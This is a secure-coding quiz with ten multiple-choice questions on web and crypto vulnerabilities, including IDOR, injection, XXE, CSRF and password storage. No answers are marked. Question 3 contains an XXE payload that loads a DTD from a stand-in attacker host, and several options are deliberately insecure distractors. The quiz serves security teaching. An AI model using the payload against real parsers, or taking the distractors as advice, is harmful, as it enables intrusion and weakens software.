Test yourself!
1. Which of the URLs below are likely to be manipulated by an attacker to access a resource they shouldn't be able to access (Insecure Direct Object Reference)?
https://www.example.com/articles/220101-happy-new-year-from-examplecom
https://www.example.com/help?helpfile=docviewer.txt&language=en
https://www.example.com/documents/390c1890-2bd3-4f3a-878f-ed896a2979c7
https://www.example.com/users/134/messages
https://www.example.com/invoices/19374
2. What do programmers need to do to avoid injection vulnerabilities in databases?
Nothing in particular; SQL injection is a solved problem in 2022.
Use an ORM such as Hibernate, Entity Framework or SQLAlchemy.
Use static stored procedures or server-side parameterized / prepared statements.
Escape control characters such as single and double quotes.
Use noSQL databases such as MongoDB, Cosmos DB or DynamoDB, since they are immune to SQL injection.
3. Take this XML:
<?xml version="1.0" ?>
<!DOCTYPE evil [
<!ENTITY % dtd SYSTEM "https://evil.hacker.com/evil.dtd">
%dtd;
%dosomething;
]>
<a>&x;</a>
Assuming that the attacker is in control of https://evil.hacker.com/evil.dtd, which of the following can the attacker realistically force our program to do when we parse this XML file?
Consume extreme amounts of memory.
Read an arbitrary file from the file system.
Infect other XML files on our machine to make them malicious as well.
Access an intranet server's functionality.
Deploy malware to the server.
4. Let's say users on your website can upload a .jpg file into a file storage area. How would you protect your system from malicious uploaded files?
Store uploaded files in a directory outside the web application's webroot.
Only accept the file if its extension ends with .jpg.
Validate the Content-Type header and only allow the upload if it is "image/jpeg".
Attempt to open the file via the JPEG parser library, and verify that it opens correctly.
Set the filename yourself instead of relying on the one given by the user.
5. What would you do if you had to upgrade your user password storage to use a more secure storage algorithm (e.g. switching from MD5 to Argon2)?
"Password recovery": reverse all user password hashes to recover them, then use the plaintext passwords as input to Argon2 and update all stored passwords in the database.
"Forced upgrade": Zero out all password hashes and send all users an email to force them to recover their account (e.g. by using one-time codes sent out to them at time of registration) and set a new password. Once a user has gone through the password recovery process, use their new password as input to Argon2 and store the result in the database.
"Soft upgrade": When a user logs in, once they've managed to successfully authenticate, use the password they entered as input to Argon2 and store it in the database, replacing their old password hash.
See "Forced upgrade", but also keep a copy of the old password database around to make sure users don't pick the same password they had before.
See "Soft upgrade", but also rehash all old MD5 password hashes with Argon2 immediately, and verify this double hash on login (Argon2(MD5(password))) until a user has successfully logged in and had their password upgraded.
6. Which of the following will have a positive effect on the strength of user passwords?
Only printable ASCII characters should be used in a password (verified via an allowlist).
Passwords should be at least 14 characters long.
A denylist should be used to reject dictionary words and patterns like "qwertyuiop".
Copy and paste functionality should be disallowed on the login screen.
Users should change (rotate) their passwords regularly.
7. Which of the following solutions can help developers avoid Cross-Site Request Forgery (CSRF) attacks?
Generate a random token value for each session, store it in a cookie, and append it to all URLs in the generated HTML. Then verify that both the URL parameter and the cookie are present and have the same value when processing each request.
There is no need to deal with CSRF anymore, since modern Web frameworks have built-in protection against it.
Set "SameSite=Lax" or "SameSite=Strict" as a cookie attribute.
Verify the "Origin" and "Referer" (sic!) headers on each request.
Generate a random token value for each session (or each request), store it as a session variable, and put it into all generated HTML pages so it's sent back to the server with each request. Then verify that the token is present and matches the session value when processing each request.
8. You're using MegaBrainSoft's JSON library to parse JSONs sent by the client. Someone posted a tweet about a zero-day vulnerability in it:
A potential remote code execution (RCE) if a JSON schema is used to validate a malformed JSON file. The vulnerability is called "BrainF0g" (CVE-2022-xxxxx) and has a CVSS score of 9.8 on NVD. MegaBrainSoft says a patch will be released in 7 days. Which of the following steps are productive in this situation?
Wait until MegaBrainSoft publishes the patch, then update to the new version.
Disable JSON schema validation functionality in the code.
Calculate BrainF0g's temporal and environmental CVSS scores, with all the other steps this implies (e.g. trying out the proof-of-concept exploit code in a test environment).
Immediately switch out the JSON parser for another vendor's product.
Rewrite the validation function so that the JSON schema validator is only called if the JSON is well-formed in the first place.
9. Which of the following are viable denial of service attacks against a modern web application behind a state-of-the-art load balancer?
SYN flood and ping of death.
Regular Expression Denial of Service (ReDoS).
A Distributed Denial of Service (DDoS) attack where each node makes HEAD requests to the server.
Uploading an XML bomb or decompression bomb via the appropriate interface.
Slow attacks such as Slowloris and RUDY.
10. Which of the following statements are true?
Older encryption algorithms (like AES) should be deprecated in favor of elliptic curve cryptography due to advances in quantum computing.
If using a block cipher, the ECB mode of operation should never be used.
The initialization vector should be hard-coded to ensure consistency when encrypting data.
A strong random number generator (TRNG or CSPRNG) is a prerequisite for using cryptographic algorithms.
Message Authentication Codes and digital signatures are both used to protect data integrity, authenticity, and non-repudiation.